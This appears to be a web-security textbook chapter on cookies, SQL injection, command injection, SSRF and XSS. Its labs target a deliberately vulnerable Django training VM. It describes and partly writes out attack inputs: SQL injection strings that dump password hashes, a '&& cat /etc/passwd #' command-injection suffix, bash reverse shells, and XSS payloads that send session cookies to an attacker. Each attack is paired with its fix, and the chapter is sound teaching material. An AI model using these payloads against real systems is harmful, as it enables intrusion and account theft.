In this chapter, we will look at one of the most common sources of vulnerabilities in a web application: user input. It can pose a threat when that input is displayed in web pages, stored on the server, or executed.
We will begin by looking in some detail at how cookies are set by a web server and how they are used by the browser. Incorrect cookie settings are a frequent source of vulnerabilities. We will then examine some common user input-oriented vulnerabilities and how to fix them: injection, server-side request forgery, and cross-site scripting.
7.1 Types of User Input
We often think of user input as being form data that is sent to the server as a POST request, and this is often a source of vulnerabilities. However, we shall see that any data sent from the client to the server, or indeed the server to the client, can be a threat.
We saw in Chapter 1 that there are two classes of attack we must defend against: server side and client side. In server-side attacks, an attacker targets our server through a web client or some other tool. In client-side attacks, the attacker targets a user. The attacker tricks the user into performing some action, usually using tools already on their device such as their web browser. Poor handling of user input can lead to both types of attack.
Cookies
Other HTTP headers, for example, User-Agent
Form data, both interactively and programmatically submitted
JSON and XML data, for example, in REST API requests and responses
Uploads, for example, images
URLs including GET parameters and path info
While not exactly user input, JavaScript, even when sent from your own site, can pose the same threats.
We looked at JSON and XML data in the last chapter. We will look at the remainder in the sections that follow.
7.2 Cookies
Cookies are key/value pairs sent from the server to the client in a response header. The client, for example, a web browser, stores them in a file and sends them to the server in a request header if certain conditions are met.
Cookie attributes supported by the Set-Cookie header
Attribute | Meaning |
---|---|
Expires=datetime | Do not send the cookie after the given time. The value should be given as day, month year hour:min:sec TZ. |
Max-Age=secs | Do not send the cookie after the given number of seconds have elapsed. |
Domain=domain | Only send the cookie for given domains. |
Path=path | Only send the cookie for URLs under the named path (including subpaths). |
Secure | Only send the cookie over HTTPS. |
HttpOnly | Do not allow the cookie to be read by JavaScript code. |
SameSite=value | Controls how the cookie is sent in cross-site requests. Described in the following text. |
The allowable attributes are given in Table 7-1.
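As a concrete illustration, these attributes appear after the name/value pair in the Set-Cookie response header. Python's standard library can construct such a header (a sketch; the cookie name and value are invented):

```python
from http.cookies import SimpleCookie

# Build a Set-Cookie header for a hypothetical session cookie.
cookie = SimpleCookie()
cookie["sessionid"] = "abc123"                # the key/value pair itself
cookie["sessionid"]["max-age"] = 1209600      # stop sending after 2 weeks
cookie["sessionid"]["path"] = "/"             # send for all URIs on the host
cookie["sessionid"]["secure"] = True          # only send over HTTPS
cookie["sessionid"]["httponly"] = True        # hide from JavaScript
cookie["sessionid"]["samesite"] = "Lax"       # limit cross-site sending

header = cookie.output(header="Set-Cookie:")
print(header)
```

The resulting header line contains the name/value pair followed by the attributes, separated by semicolons.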
The Expires and Max-Age Attributes
The Max-Age attribute instructs the client when to stop sending the cookie, as a number of seconds from when it is received. The Expires attribute does the same thing but as an absolute time and date. The attributes are mutually exclusive: it makes little sense to send both. If neither is set, the cookie is a session cookie, which is deleted once the browser is closed.
Domain and Path
By default, the cookie is sent with requests to the host that set it (the host in the URL of the response that carried the Set-Cookie header) and to no other hosts, not even its subdomains.
If the Domain attribute is set, the cookie is sent to that domain and subdomains. For example, if Domain is set to example.com, it is sent to example.com, www.example.com, etc. If it is set to www.example.com, it is only sent to that host.
If Path is set, it is only sent for URIs under that path. For example, if Path is /api, the cookie is sent for /api, /api/call1, etc. If it is set to /, the cookie is sent to all URIs.
The Secure and HttpOnly Attributes
The Secure flag prevents the cookie from being sent to the server when the connection is not encrypted. This is especially important when cookies contain sensitive data such as session IDs. It is important to remember, however, that the cookie is still stored unencrypted on the user’s computer.
The HttpOnly flag makes the cookie inaccessible to client-side scripts: JavaScript reading document.cookie will not see the cookie if HttpOnly was set. We will return to this later in the chapter when we talk about cross-site scripting.
The SameSite Cookie Setting
The SameSite attribute controls in what cross-site circumstances the cookie is sent.
If set to None, the cookie is always sent. However, modern versions of Chrome and Firefox will not send it at all unless the Secure flag is set and the page is loaded over HTTPS.
If set to Lax, the cookie is not sent on cross-site requests unless the request is a top-level page load using a “safe” HTTP method (GET, HEAD, or OPTIONS). This means, for example, that the cookie would not be sent when loading a URL in an IMG tag on a different site.
The cookie SameSite attribute
Situation | None | Lax | Strict |
---|---|---|---|
Following links from the same domain | Sent | Sent | Sent |
Direct navigation (URL typed in the address bar, link clicked in an email client, link from another application) | Sent | Sent | Sent |
Following safe top-level links from a different domain | Sent | Sent | Not Sent |
Following other links from a different domain | Sent | Not Sent | Not Sent |
The behavior when following a link in an email when SameSite is Strict is often a source of confusion. If the link is followed from a nonbrowser application, such as a desktop email client or a Word document, the cookie is sent. If a web-based email client is used, clicking the link is a cross-site navigation, just like clicking a link on any other website, and in this situation the cookie is not sent.
It is important to remember that the cookie attributes are directives to the browser. The server cannot control whether the browser will honor them. A user is also free to edit the browser’s cookie file and change its attributes, and also the name and value. Application security should therefore not depend on the cookie remaining unchanged, unless it is very difficult for a user or attacker to guess or derive another value (as should be the case for session cookies, for example).
Session ID Cookies
Session ID cookies are a common way for websites to keep a user logged in between requests. As HTTP is stateless, the only way to associate a user with a request is to store something on both the client and server that can be matched against each other.
When a user sends a server a username and password, for example, through a web form, the application’s back-end code can look those up in the user table of its database (in practice, the database will probably have a hashed version of the password instead of cleartext). If they match, the server creates a token. This is the session ID and can be as simple as a random string. This session ID, the user ID, and an expiry date are stored in a table on the server, and the token is sent, with a matching expiry, as a cookie to the client.
Whenever the client sends the session ID to the server, it is matched against the session table. If there is a matching row, and the expiry date has not passed, the user ID is extracted from that row, and the user is considered logged in.
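The flow can be sketched with an in-memory session table (a simplified illustration; a real application stores sessions in a database and the details vary by framework):

```python
import secrets
import time

sessions = {}  # session_id -> (user_id, expiry); stands in for the DB table

def create_session(user_id, max_age=1209600):
    """Called after the username/password check succeeds."""
    session_id = secrets.token_urlsafe(32)       # unguessable random token
    sessions[session_id] = (user_id, time.time() + max_age)
    return session_id                            # sent to the client as a cookie

def user_for_session(session_id):
    """Called on each request that carries the session cookie."""
    row = sessions.get(session_id)
    if row is None:
        return None                              # unknown session ID
    user_id, expiry = row
    if time.time() > expiry:
        del sessions[session_id]                 # expired: force a fresh login
        return None
    return user_id

sid = create_session(user_id=42)
print(user_for_session(sid))       # 42
print(user_for_session("bogus"))   # None
```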
In Django, the cookie is called sessionid by default, and the session table in the database is called django_session. The session ID is in the column session_key. The user ID is stored, along with other session state, in the column session_data. The data is serialized as JSON, signed with Django’s secret key, compressed, and Base64 encoded. The signing prevents the database row from being tampered with, for example, by assigning a different user ID to an existing session ID or by creating a new session ID.
Looking up the session manually is rarely necessary in practice, as Django does it automatically. The user object is available as request.user in each view. If there is no session ID, or it is invalid, request.user is an AnonymousUser instance.
Session IDs and the SameSite Setting
Suppose the session cookie for coffeeshop.com is set with SameSite=None. If the user follows a link from a page on coffeeshop.com to another page on the same domain, the cookie will be sent.
If the user types coffeeshop.com/someurl/ into the browser, the cookie will be sent.
If the user is emailed a link to coffeeshop.com/someurl/ and clicks on it, the cookie will be sent.
If the user follows a link to coffeeshop.com from another site, the cookie will be sent.
In all cases, the site will receive the session ID, and the user will be considered logged in without having to enter a username and password.
If SameSite is instead set to Lax, the cookie is sent in fewer situations:
If the user follows a link from a coffeeshop.com page to another page on the same domain
If the user types coffeeshop.com/someurl/ into the browser
If the user is emailed a link to coffeeshop.com/someurl/ and clicks on it
In all these cases, the user will be considered logged in. If the user visits by following a link on another site, the user will not be logged in and will be prompted for a username and password.
Finally, if SameSite is set to Strict, the cookie will only be sent if the user follows a link from a coffeeshop.com page to another page on the same domain. In all other cases, the user will have to log in again.
Setting the same site value inappropriately can lead to certain attacks such as cross-site request forgery. We will investigate these in Chapter 8.
7.3 Injection Attacks
Injection refers to vulnerabilities where a user can submit input that is executed in some way on the server. If an input field is not validated, an attacker can insert malicious code or data. Usually, the user-entered code is concatenated with code on the server, rather than being a complete command in itself.
The most well-known injection vulnerability is SQL injection. The most common source is form fields (e.g., username/password fields, search fields), but the vulnerability can exist anywhere where data is captured from the client and executed on the server in a SQL query. Other places can include GET parameters or REST API calls.
Other types of injection include command injection, where OS commands are executed (e.g., Bash commands executed through Python’s os.system() function), and code injection (e.g., executing Python code through its eval() function). Cross-site scripting, which is effectively injecting HTML and JavaScript code, is discussed in the next chapter.
7.4 SQL Injection
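The examples that follow assume the login check builds its SQL by string concatenation, along these lines (a hypothetical sketch; the table and column names are illustrative):

```python
def build_login_query(username, password):
    # VULNERABLE: user input is pasted directly into the SQL text
    return ("select * from User where username = '" + username +
            "' and password = '" + password + "'")

# With benign input, the query is what the developer intended:
query = build_login_query("bob", "secret")
print(query)
# select * from User where username = 'bob' and password = 'secret'
```

The trouble starts when the input itself contains SQL syntax, as we will now see.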
Here, username and password are taken from the two form input fields.
If the user enters a username and password that match an entry in the User table, a row will be returned by the SQL query, and the user will be logged in.
Suppose the attacker instead enters a username such as bob'-- : the quote closes the string, and the -- comments out the rest of the query, including the password check. So long as the user bob exists, a row will be returned regardless of what the password is. The attacker will be logged in.
A username such as anyusername' or 1=1 limit 1 -- goes further. Regardless of whether a user called anyusername exists, the or 1=1 clause will select all rows from the User table. In case multiple rows break subsequent code, the attacker adds limit 1 to restrict the output to a single row.
A semicolon takes this further still: it ends a SQL statement and begins a new one, allowing the attacker to append a second, complete statement such as an INSERT. Not only would the attacker be logged in as the first user in the order rows are returned, but they would also be able to create their own user. Similarly, the attacker could delete or alter rows.
Schema Discovery
Each of the preceding examples required that the attacker know the column names in the user table, though username and password would have been obvious guesses. The last example required the attacker to know that the user table is called User. In Django, this is not the case; it is auth_user. The attacker could of course try many different names (auth_user is also a sensible guess, as many applications are built with Django). However, an attacker could also query the schema to find out what the table is called.
Clicking Search causes matches to be displayed in a page.
The union keyword joins two select queries together. The only requirement is that the number and types of the selected columns match. In the server code, two varchar columns, name and description, are selected. The attacker ensures they select two columns of type varchar.
The pg_catalog.pg_tables view in Postgres contains the names of all the tables in the database. Fortunately, it has two useful string-typed columns: schemaname and tablename.
Most likely, no results will be returned by the actual search string xxx. However, the other select statement will return all the schema and table names in the database as part of the search results.
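A search term along these lines would achieve this (a sketch; the shape of the server-side query is an assumption, but the pg_catalog.pg_tables column names are real):

```python
# What the attacker types into the search box:
payload = "xxx' union select schemaname, tablename from pg_catalog.pg_tables --"

# If the server concatenates the term into a query such as
#   select name, description from Product where name like '%<term>%'
# the resulting SQL becomes:
query = ("select name, description from Product where name like '%" +
         payload + "%'")
print(query)
```

The quote closes the like pattern, the union appends the schema query, and the trailing -- comments out the leftover %' from the original query.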
Now the attacker does not have to know what the user table is called. They can get Postgres to tell them. They do have to know that Postgres is the database engine. They could just try the correct syntax for all popular databases—there are not that many. Alternatively, they could run nmap. Recall from Chapter 5 that nmap revealed that Postgres was running.
If the attacker does not know how many columns the server’s query selects, or their types, they can try union selects with successive combinations until one runs without error:
int
float
varchar
int, int
int, float
int, varchar
Once they find a query that works, they can run a few more: one to get the schema names, another to get the column names, and so on. This is another reason why detailed error messages should not be displayed for users—it can reveal the schema to attackers. Hiding errors may not prevent a determined attack, but the attacker will need more queries, which may be noticed when monitoring logs or traffic.
Of course our attacker would probably not enter all these queries manually. They would script them, or use an existing tool. One open source tool is sqlmap.1
Finding SQL Injection Vulnerabilities
The easiest way for an attacker to spot a SQL injection vulnerability is to enter a single quote in a form field by itself and see if an error is raised. Say the form field was a search box. If the server code is secure, entering a single quote should either return no results or return results that really did contain a single quote. If a vulnerability exists, the server would either return an error or something indicating the code failed, for example, a blank page.
Defending Against SQL Injection
A tempting defense is to delete quote characters from user input before using it. However, there are many ways of encoding input that may well prevent the quote deletion from succeeding. Hackers also replace a single quote with its URL-encoded form %27 to avoid detection.
A far safer defense is to not use string concatenation at all. Instead, use prepared statements.
Prepared statements are a feature of SQL engine APIs. Placeholders are inserted into the SQL query where user-provided data is expected. The statement is compiled, and the user input is passed as a parameter to the execution function along with the compiled SQL statement. They also improve performance, especially if the query is reused, as it only needs to be compiled once.
If the user-provided name or desc contains quotes, comment characters, semicolons, etc., they will be part of the placeholder replacement, not additional SQL query syntax.
Note that %s is the placeholder for all data types, not just strings. For example, use %s, not %d, for integers.
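A minimal sketch using Python’s built-in sqlite3 module (SQLite uses ? as its placeholder; the Postgres driver psycopg2 uses %s, but the principle is identical):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("create table product (name text, description text)")
conn.execute("insert into product values ('espresso', 'strong coffee')")

# Attacker-style input: concatenated into a query, this would break out
# of the string literal and inject a union select.
term = "xxx' union select 1, 2 --"

# With a placeholder, the input is bound as data, never parsed as SQL.
rows = conn.execute(
    "select name, description from product where name like ?",
    ("%" + term + "%",),
).fetchall()
print(rows)   # [] -- the malicious text matched nothing and injected nothing

# A legitimate search still works as expected.
print(conn.execute(
    "select name, description from product where name like ?",
    ("%espresso%",),
).fetchall())
```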
file inside the Coffeeshop VM.
The Coffeeshop application has a SQL vulnerability in the search function. Visit the Coffeeshop URL at
http://10.50.0.2
We will exploit the vulnerability by using the search term to display all usernames and hashed passwords from the auth_user table (columns username and password).
and press Enter. You should see usernames and passwords in the search results.
Our union has to have matching data types for the selects on either side. As the code selects an integer, two strings, and a float, we have to select the same after the union. As the auth_user table has no float columns, we select a constant value.
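A search term along the following lines should therefore work (a sketch, not the only possible solution; the constant 1.0 fills the float column that auth_user lacks):

```python
# Hypothetical search term for the exercise: an integer, two strings,
# and a constant float, matching the column types of the original query.
payload = "xxx' union select id, username, password, 1.0 from auth_user --"
print(payload)
```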
Press Enter to run the query. You should now be able to visit the admin page http://10.50.0.2/admin and log in as bob (his username is in coffeeshop.com/secrets/config.env).
We don’t want bob to be a superuser so reset his permissions, either with another SQL injection command or using the Admin page.
Removing the Vulnerability
Restart Apache with sudo apachectl restart to pick up the code changes. If you have errors, they will be in /var/log/apache2/error.log.
After fixing the vulnerability, confirm that a legitimate search still works and that SQL injection does not.
7.5 Command Injection
Command injection vulnerabilities are similar to SQL injection. The difference is that user-supplied text is concatenated with a shell command that is executed on the server, rather than SQL code that is executed by the database.
If the attacker appends && cat /etc/passwd # to the expected input, the server would execute the scale command as expected but would then also print out the contents of the system password file. The double ampersand is Bash’s AND operator and an effective way of joining two commands into a single command line. The hash is the comment character, which discards whatever the server code appends after the injected input. If the output were captured and displayed in the response, the attacker would be able to view the system users.
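Putting these pieces together, a malicious value for the scale field might look like this (a sketch; the attacker’s IP address and port, and the server’s convert command line, are assumptions for illustration):

```python
# Attacker's input for the "scale" form field.  The && chains a second
# command; the trailing # comments out whatever the server appends.
scale = '50 && bash -c "bash -i >& /dev/tcp/10.50.0.1/9000 0>&1" #'

# If the server builds its command line by concatenation...
command = "convert -resize " + scale + "% input.png output.png"
print(command)
# ...the shell sees two commands: the resize, then the reverse shell.
```

Before submitting this, the attacker starts a listener on their own machine, for example with nc -l -p 9000.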
This initiates a reverse shell. A normal shell session is initiated by a client connecting to a port on the server and gives the client an interactive session on the server. A reverse shell works in the opposite direction: the compromised server connects out to a port on the attacker’s machine, and the attacker gets an interactive session on the server. The >& redirects standard output and standard error. In normal usage, this would be to a file. However, Bash allows them to be redirected to a TCP connection, as in this example. The 0>&1 redirects standard input to the same connection. The result is that when Bash runs, input is read from and output written to the remote TCP port. The -i flag creates an interactive shell.
The outer Bash command is because os.system() runs its argument through /bin/sh, not Bash. TCP port redirection is not supported in /bin/sh, so we need an additional Bash command to interpret it.
Once a connection is established, the nc command simply prints anything received on the given port to the terminal and sends terminal input to the port.
When the os.system() command is executed, the Bash command runs and connects to the hacker’s open port. The hacker can type commands, and they will be executed on the remote server, with the output sent back to the hacker’s port. As the Bash command was started by Apache, it will run as the same user, typically www-data, with that user’s privileges.
In the last chapter, we discussed the danger of running a web server with more permissions than necessary. The consequences should now be clear. If this vulnerability exists and www-data has write permission on the code, the attacker can change your application. The attacker can also connect to the database and run any query permitted by the web server’s database user.
Back Doors
A reverse shell is an example of a back door: an entry point an attacker uses that was not intended by the developer. In our example, the developer expects connections over HTTP and HTTPS on ports 80 and 443, but the attacker has created a Bash entry point on port 9000.
A Bash shell using nc is useful for an attacker and dangerous for the application. However, it is still rather limiting: the attacker must be present to operate the shell interactively, it only accepts one connection at a time, and file upload and download are difficult to achieve.
Fortunately for attackers, other back doors exist. It is not hard to see how nc could be replaced by a more sophisticated application that spawns a new thread for each connection and that automates commands rather than requiring them to be entered interactively.
Also fortunately for attackers, tools already exist with more features. Metasploit2 is a popular framework with many exploits built in and is also extensible. Metasploit contains exploits and payloads. Exploits are modules that take advantage of a vulnerability. One example is Metasploit’s web_delivery exploit, which takes advantage of a vulnerable web form.
Once the exploit has been executed, Metasploit delivers a payload. The user can select from a number that are supported by each exploit. A Bash reverse shell over TCP (such as the one we showed in our example) is one option, but Metasploit makes an additional 20 available for the web_delivery exploit.
Metasploit also has staged payloads, which are delivered in parts. Once the exploit is executed, Metasploit delivers a small payload (the stager) whose only purpose is to download a larger one with more features. The python/meterpreter/reverse_tcp payload, for example, has file upload and download commands.
Defending Against Command Injection
Firstly, system commands should be used very sparingly. If developing an application in Python, use Python commands and packages wherever possible, rather than making system calls.
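When a system command is unavoidable, pass the arguments as a list so the shell never parses user input. A sketch, using echo as a stand-in for a real image tool (the scale parameter is from the earlier example):

```python
import subprocess

scale = "50 && cat /etc/passwd #"   # attacker-controlled input

# The list form runs the program directly: no shell is involved, so &&
# and # are just characters inside a single argument, not operators.
result = subprocess.run(
    ["echo", scale + "%"],
    capture_output=True, text=True, check=True,
)
print(result.stdout.strip())   # 50 && cat /etc/passwd #%
```

The injected text is echoed back verbatim as one argument; no second command ever runs.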
This syntax is more secure because the scale variable (with % appended to it) is always passed as a single command-line argument. Adding spaces, semicolons, ampersands, or comment characters will only ever add them to that argument; they cannot create additional arguments or commands.
subprocess.run() also accepts a shell=True argument, which passes the command line through the shell. You should avoid this, as it is as insecure as os.system().
The Coffeeshop application has a command injection vulnerability in the contact form. Visit the Coffeeshop URL at
http://10.50.0.2
and click Contact in the menu bar at the top. You will have to log in if you have not done so already.
and you should see your message.
Take a look at the code in the contact() function in views.py to see how this works. Execute the code by sending the email.
End the shell session with Ctrl-C. Note that, because the Bash session is interactive, the web page will not finish loading until you quit the reverse shell.
The solution to this exercise is in coffeeshop/vagrant/snippets/injection.txt.
Combining SQL and Command Injection
The previous example required a command injection vulnerability to be present. If there isn’t one, a reverse shell can sometimes be obtained through SQL injection. Many databases, Postgres included, allow shell commands to be executed from SQL queries. In Postgres, this is disabled by default except for superusers (which is another reason for your web application not to use a superuser account to access the database).
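An injected search term could then look something like this (a sketch; the table name and the attacker’s address are invented, and the shape of the server-side query is assumed):

```python
# SQL injected via a vulnerable search field.  COPY ... FROM PROGRAM runs
# a shell command as the database server's OS user (superuser-only by
# default in Postgres) and copies its output into a table.
payload = (
    "xxx'; "
    "create table shell_out (line text); "
    "copy shell_out from program "
    "'bash -c \"bash -i >& /dev/tcp/10.50.0.1/9000 0>&1\"'; --"
)
print(payload)
```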
For clarity, we have split the command onto several lines. In a real attack, it would be entered without the carriage returns.
The COPY … FROM PROGRAM … command is Postgres’ syntax for running a shell command. The output is copied into a table. Of course, we need a table to copy it into, so we create the table first.
For our reverse shell, we are not interested in the output, so we don’t care if we can read the table or not (though we can with further SQL injection commands). We just want the command to be run so that it connects to our nc server.
Clearly, allowing the web application’s database user to run shell commands is dangerous, and this feature should be disabled in all but very specialist applications.
7.6 Server-Side Request Forgery
One of the more well-known web vulnerabilities is cross-site request forgery (CSRF), which we will discuss in detail in Chapter 8. Server-side request forgery (SSRF) is a relatively new attack and, despite its similar name, has less in common with cross-site request forgery than with injection attacks.
SSRF vulnerabilities occur when a request from a client to a server contains another request embedded in it, or enough of a request fragment that an attacker, by crafting suitable input, can cause the server to make a request the developer did not intend to make available. The attack is possible because the embedded request is made from within the server’s network, not from the outside Internet.
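As a hypothetical example, imagine an endpoint that fetches whatever URL the client supplies (the parameter name and port number are invented for illustration):

```python
from urllib.parse import urlparse, parse_qs

# A request like this asks the server to fetch an arbitrary URL on the
# attacker's behalf:
#   GET /fetch?url=http://localhost:9000/admin
# From the Internet, localhost:9000 is unreachable; from inside the
# server's own network, it is not.
request_line = "/fetch?url=http://localhost:9000/admin"

# The embedded request the server would naively go on to fetch:
embedded = parse_qs(urlparse(request_line).query)["url"][0]
print(embedded)   # http://localhost:9000/admin
```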
Since the embedded call is made from within the intranet, port 9000 on localhost is not blocked. If the administrators assumed that only authorized users have access to this port and therefore do not protect it with a username and password, the attacker can gain access without needing to authenticate.
This may sound like a rather obvious vulnerability, yet it exists in the real world. One existed in GitLab until June 2021, when it was patched.3 An API call accepting an embedded URL, similar to the preceding situation, was made available to integrate GitHub projects with GitLab. The vulnerability arose because attackers, even unauthenticated ones, could use the API call to make requests to other hosts internal to the network where the GitLab instance was running.
Defending Against Server-Side Request Forgery
The best defense against SSRF is to not make requests based on the contents of client-supplied requests, at least not without first sanitizing the request. If you must make this functionality available, ensure the host, port, protocol, and path match some criteria.
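A sketch of such a check (the allowed host and port are assumptions for illustration; a real deployment would derive the allowlist from its configuration):

```python
from urllib.parse import urlparse

ALLOWED_HOSTS = {"api.github.com"}   # hypothetical allowlist

def is_safe_url(url):
    """Accept only HTTPS URLs to explicitly allowed hosts on the default port."""
    parts = urlparse(url)
    return (parts.scheme == "https"
            and parts.hostname in ALLOWED_HOSTS
            and parts.port in (None, 443))

print(is_safe_url("https://api.github.com/repos"))   # True
print(is_safe_url("http://localhost:9000/admin"))    # False: wrong scheme, host, port
```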
7.7 Cross-Site Scripting (XSS)
There are three main categories of XSS vulnerability:
- 1.
Reflected XSS, where the JavaScript code is transient rather than being stored on the server
- 2.
Stored XSS, where the JavaScript is stored on the server
- 3.
DOM-based XSS, where only the DOM environment is changed rather than actually changing code
There is also Blind XSS, where JavaScript code is executed in a context that does not update the screen, for example, an asynchronous request. It is similar to Stored XSS except for being more difficult to test for.
An attacker’s aim might be to have the code executed in their own browser, but more commonly the aim is to have it executed in a victim’s browser.
XSS vulnerabilities are attractive to attackers because the JavaScript code is run in the context of the vulnerable site and is run by the victim on their own browser.
Reflected XSS
If an attacker enters a script as the search term, then when the search results are displayed, the page will contain the JavaScript, enclosed in legal HTML <script> … </script> tags, and it would therefore be executed.
This is an example of Reflected XSS. The JavaScript is not stored on the server but is sent to the browser in the response and executed there.
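A sketch of the idea, showing what an unescaped search term turns into (the results-page markup is invented):

```python
# What the attacker types into the search box:
search_term = '<script>alert("Hacked")</script>'

# If the server inserts the term into the results page verbatim...
page = "<h1>Results for " + search_term + "</h1>"
print(page)
# <h1>Results for <script>alert("Hacked")</script></h1>
```

The browser has no way to tell the injected script tag apart from the page’s legitimate markup, so it runs the script.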
The code is only executed in the attacker’s browser; other users do not receive it. This may still have a harmful impact if the developer assumed certain JavaScript code would or would not be executed, for example, client-side form validation.
However, if this is the goal of the attacker, there is an easier way to have JavaScript code executed in their browser: by editing the HTTP response before it reaches the browser. We will do this in the next exercise.
If you followed the setup instructions in Chapter 2, you should have HTTP Toolkit installed. We will use this to intercept and alter requests from our Coffeeshop application.
Click on the + Add a new rule to rewrite requests or responses button. In the Match drop-down, select Any requests, and in the Then drop-down, select Pause the response to manually edit it.
Under Any requests, you will see another drop-down titled Add another matcher and a Plus button. Click the drop-down and select For a URL. Enter our Coffeeshop application root URL underneath, http://10.50.0.2/. Your window should look like Figure 7-1. Now click on the Plus button to save the matcher and then the Save button to save the rule.
You can now close HTTP Toolkit. It will also close the Chrome window.
Hackers are less interested in their own cookies than in other people’s and so are more likely to try to get JavaScript code executed by a victim’s browser, not their own.
One way would be to send a victim a link to a page with a reflected XSS vulnerability, crafting the link to contain malicious JavaScript. The Coffeeshop application has a vulnerable page to display a product, using the URL
http://10.50.0.2/prod/?id=<productid>
If the URL is called with a valid product ID, for example:
http://10.50.0.2/prod/?id=1
then the product is displayed. If an invalid one is provided, an error message states that the requested ID was not found. Since the user input is displayed unchanged in that message, setting it to a URL-encoded script, for example:
http://10.50.0.2/prod/?id=%3Cscript%3Ealert%28%22Hacked%22%29%3C%2Fscript%3E
causes the script to be inserted into the page and executed. If this link is emailed to a victim, the script will be executed in their browser. You can try this on your Coffeeshop instance and verify that it works.
Another way to get someone else to execute your JavaScript is to get it stored on the server. This is where Stored XSS comes in.
Stored XSS
Sometimes, user input is persisted in an application’s database and then displayed in HTML pages. Examples include social media posts, blog posts, product reviews, and so on. If an attacker can get malicious JavaScript code stored there, it will be executed whenever another user visits the page that displays that input. It will be executed as that user, with that user’s cookies.
Our Coffeeshop application has one such vulnerability, in a form where users can leave comments about products. We will exploit this in the next exercise.
Visit the Coffeeshop application at http://10.50.0.2 in Chrome. Log in as bob (see the file coffeeshop/secrets/config.env for the password). Now click on any of the products to see the details page.
Now reload the page. You will see the alert pop up with your session ID and the CSRF cookie. If you log out and log in again as alice, her cookies will be displayed.
Showing a user their own cookie is not much of a risk. An attacker prefers to have the cookie sent to them. One option is for the attacker to create a web service with a GET URL that saves cookies passed in the URL. They simply create a comment with some JavaScript to call this URL using the document.cookie value. Whenever a user views that comment, the URL will be called, sending their cookies to the attacker.
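The malicious comment might look something like this (a sketch; the attacker’s host and URL path are invented):

```python
# A comment the attacker submits on a product page.  When a victim's
# browser renders it, the script sends their cookies to the attacker's
# cookie-collecting URL via an image request.
comment = (
    "Great coffee!"
    "<script>"
    "document.write('<img src=\"http://10.50.0.3/cookies/?c='"
    " + encodeURIComponent(document.cookie) + '\">');"
    "</script>"
)
print(comment)
```

The innocuous text at the start makes the comment look legitimate to anyone browsing the page.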
Take a look at the code in the views.py file for CSThirdparty. The function is called cookies() and is quite simple.
There are other approaches, but this one is short and synchronous, avoiding potential issues such as short comment fields in the database.
The code for this exercise is in coffeeshop/vagrant/snippets/xss.txt.
The JavaScript calls the attacker’s URL with the cookies in document.cookie appended as a GET parameter.
By entering a real comment in addition to the script, no one looking at the HTML will know their cookies have been stolen.
Exploiting the Stolen Cookie
substituting the session ID value from the cookie you saved in the CSThirdparty database.
Now refresh the page and close the Developer Tools. You should find that you are now logged in as bob.
To clean up, delete the comment again. You can also delete the cookies from the database.
DOM-Based XSS
DOM-based XSS vulnerabilities occur when an attacker can submit text (through GET parameters, form input, etc.) that is used when modifying the DOM programmatically, for example, using innerHTML.
Here, errorText is the text coming from the URL.
If the user-submitted text is not sanitized, an attacker can include executable HTML in it. Note that modern browsers do not run <script> tags inserted via innerHTML, but event handlers, such as the onerror attribute of an <img> tag, still fire, so the attacker’s JavaScript is executed all the same when the text is added to the DOM.
A page like this might exist in an application where there is no server-side rendering. It therefore relies on JavaScript to customize the contents.
Defending Against Cross-Site Scripting
Each of the XSS examples relies on user-submitted code being interpreted as HTML. The best defense is to ensure that it isn’t: remove or escape any HTML special characters such as <, >, &, etc.
This is not as easy as it might first appear. Like escaping URL-encoded input, there are several common mistakes that hackers know and can exploit. The best strategy is to use a well-established third-party library to do the escaping. Django has one built in.
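The principle can be seen with Python’s standard library html module (Django’s template engine applies the same kind of escaping automatically when rendering variables):

```python
import html

# The stored XSS payload from earlier in the chapter...
comment = '<script>alert("Hacked")</script>'

# ...rendered inert: the browser displays the text instead of running it.
escaped = html.escape(comment)
print(escaped)
# &lt;script&gt;alert(&quot;Hacked&quot;)&lt;/script&gt;
```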
The braces {{ ... }} are Django’s syntax for variable substitution, so this prints the value of comment.comment.
By default, Django will escape this. Appending the safe filter tells Django to treat the variable as safe text and not to perform escaping. Variables containing user input, as in this case, should definitely not be marked as safe unless the input has already been escaped in back-end code.
There are additional defenses that specifically relate to session IDs (and CSRF cookies, which we will look at in the next chapter). Session IDs need special defenses because they contain sensitive information. As we saw in the last exercise, they perform the same function as a username and password and should be handled just as securely. The difference is they are designed to be disposable: we can invalidate a user session by deleting the server-side entry for that ID, and the only inconvenience is that the user will have to log in again.
We saw in Section 7.2 that we can place limitations on how a cookie is used when we send it to the client. The session-grabbing attack in the last exercise would have been prevented if we had set the HttpOnly parameter in the cookie. It would then be inaccessible to JavaScript. Other cookies would be sent to the attacker, but not the cookies created with HttpOnly.
And of course no cookies would be sent at all if we had escaped the HTML.
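In Django, HttpOnly is normally controlled through the settings shown below, but the effect on the Set-Cookie header itself can be illustrated with the standard library's http.cookies module (the cookie name and value here are hypothetical):

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie['sessionid'] = 'abc123'           # hypothetical session ID
cookie['sessionid']['httponly'] = True   # invisible to document.cookie
cookie['sessionid']['secure'] = True     # only sent over HTTPS

# The value of the Set-Cookie response header
print(cookie['sessionid'].OutputString())
```

The resulting header carries the HttpOnly and Secure flags, so a script running in the page cannot read the session ID.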
Django’s session cookie security variables
Variable | Meaning | Default
---|---|---
SESSION_COOKIE_AGE | Set the Max-Age parameter | 1209600 (2 weeks)
SESSION_COOKIE_DOMAIN | Set the domain the cookie will be sent for | None
SESSION_COOKIE_HTTPONLY | Set the HttpOnly flag (don't make the cookie available to JavaScript) | True
SESSION_COOKIE_PATH | Set the path the cookie will be sent for | /
SESSION_COOKIE_SAMESITE | Set the cookie's SameSite value | Lax
SESSION_COOKIE_SECURE | Set the cookie's Secure flag (only send over HTTPS) | False
Looking at this table, it is clear that by default, the session ID should not have been sent by the malicious JavaScript. It was sent because we overrode SESSION_COOKIE_HTTPONLY in our settings.py.
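A settings.py fragment restoring safe values might look like the following sketch; the values mirror the table above:

```python
# settings.py — hardened session-cookie settings
SESSION_COOKIE_HTTPONLY = True   # keep the session ID out of document.cookie
SESSION_COOKIE_SECURE = True     # only send the cookie over HTTPS (default is False)
SESSION_COOKIE_SAMESITE = 'Lax'  # the default; 'Strict' is more restrictive
SESSION_COOKIE_AGE = 1209600     # two weeks, in seconds (the default)
```

SESSION_COOKIE_SECURE is the one setting here whose safe value differs from Django's default.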
Click on the delete icon next to 10.50.0.2, then visit or reload http://10.50.0.2.
1. Change the session cookie settings in settings.py.
2. Ensure that comment text is properly escaped in product.html.
Restart Apache with sudo apachectl restart, log in as bob again, and create a new comment containing the alert() JavaScript that displays the cookie (see the exercise “Exploiting a Stored XSS Vulnerability”). Reload the page and confirm the cookie is not displayed.
